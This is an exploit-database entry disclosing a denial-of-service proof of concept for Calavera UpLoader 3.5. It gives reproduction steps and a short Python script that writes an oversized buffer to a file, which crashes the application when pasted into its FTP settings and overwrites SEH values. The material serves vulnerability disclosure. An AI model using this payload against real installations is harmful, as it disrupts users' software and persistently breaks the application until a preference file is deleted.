Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

vendor:

by:

Felipe Winsnes

5.5

CVSS

MEDIUM

Denial of Service

CWE

Product Name:

Affected Version From: 3.5

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 (x86)

2020

Calavera UpLoader 3.5 – ‘FTP Logi’ Denial of Service (PoC + SEH Overwrite)

This exploit demonstrates a denial of service vulnerability in Calavera UpLoader 3.5. The vulnerability is triggered when specific content is pasted into the 'FTP Address', 'Username', and 'Password' parameters in the application's settings. The exploit creates a file named 'poc.txt' with a specific payload, causing the application to crash. Additionally, the exploit overwrites SEH values, causing continued crashes on subsequent application launches until the 'uploadpref.dat' file is deleted. If only the 'Password' parameter is pasted with the exploit content, the application crashes once without creating 'uploadpref.dat'.

Mitigation:

To mitigate this vulnerability, it is recommended to update Calavera UpLoader to a patched version or apply any available security updates. Alternatively, users can refrain from pasting malicious content into the 'FTP Address', 'Username', and 'Password' parameters in the application's settings.

Source

Exploit-DB raw data:

# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
# Date: 2020-07-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
# Version: 3.5
# Tested on: Windows 7 (x86)

# Blog: https://whitecr0wz.github.io/

# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and 
# yet the vulnerability is triggered with additional padding == can't use addresses with null values.

# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt".
# 2.- Copy the content of the new file 'poc.txt' to clipboard.
# 3.- Open the Application.
# 4.- Click on "Settings".
# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
# 5.- Crashed.
# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.

# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.

buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000

try:
    f = open ("poc.txt", "w")
    f.write(buffer)
    f.close()
    print "[+] The file has been created successfully!"

except:
    print "[!] There has been an error while creating the file."